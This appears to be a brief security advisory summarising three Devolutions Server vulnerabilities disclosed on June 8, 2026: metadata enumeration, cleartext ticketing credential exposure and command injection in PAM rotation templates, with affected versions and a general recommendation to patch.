Devolutions Server: Three Medium-Severity Flaws Disclosed Together
Key findings • Three medium-severity vulnerabilities in Devolutions Server disclosed on June 8, 2026. • CVE-2026-10787 allows enumeration of deleted user group metadata due to missing authori…
Key findings
- Three medium-severity vulnerabilities in Devolutions Server disclosed on June 8, 2026.
- CVE-2026-10787 allows enumeration of deleted user group metadata due to missing authorization.
- CVE-2026-10786 enables obtaining cleartext credentials for ticketing integrations.
- CVE-2026-10544 permits arbitrary command execution on PAM-managed systems.
- Affected versions include Devolutions Server 2026.2.4.0, 2026.1.20.0, and earlier for some CVEs.
Devolutions Server, a product designed for secure remote access and credential management, is affected by a trio of medium-severity vulnerabilities that were disclosed simultaneously on June 8, 2026. These flaws, collectively detailed in a single disclosure event, impact different aspects of the server's security, including authorization, access control, and the execution of arbitrary commands.
One of the disclosed vulnerabilities, CVE-2026-10787, is a missing authorization flaw within the deleted user groups API. This allows an authenticated user with low privileges to enumerate metadata of deleted user groups by sending a specially crafted API request. This could potentially expose information about previously removed groups, which might still contain sensitive metadata.
Another vulnerability, CVE-2026-10786, involves improper access control in the ticketing integration settings. An authenticated, low-privileged user can exploit this to obtain cleartext credentials for configured ticketing integrations. This is achieved through a crafted API request, posing a significant risk to the security of integrated ticketing systems.
The third vulnerability, CVE-2026-10544, is more severe in its potential impact. It stems from improper neutralization of special elements within the built-in PAM provider password rotation templates. This allows an authenticated user with write access to a vault to execute arbitrary commands on the systems managed by the affected PAM provider. This could lead to a complete compromise of managed systems.
These vulnerabilities affect specific versions of Devolutions Server. For CVE-2026-10787 and CVE-2026-10786, the affected versions include Devolutions Server 2026.2.4.0 and Devolutions Server 2026.1.20.0 and earlier. CVE-2026-10544 affects Devolutions Server 2026.2.4. The disclosure of these vulnerabilities together suggests a need for prompt attention from administrators managing these systems.
Users of Devolutions Server are advised to review the specific version information for each vulnerability and apply any available patches or updates provided by Devolutions. The simultaneous disclosure of these issues highlights the importance of maintaining up-to-date security configurations and regularly reviewing access controls within the Devolutions Server environment.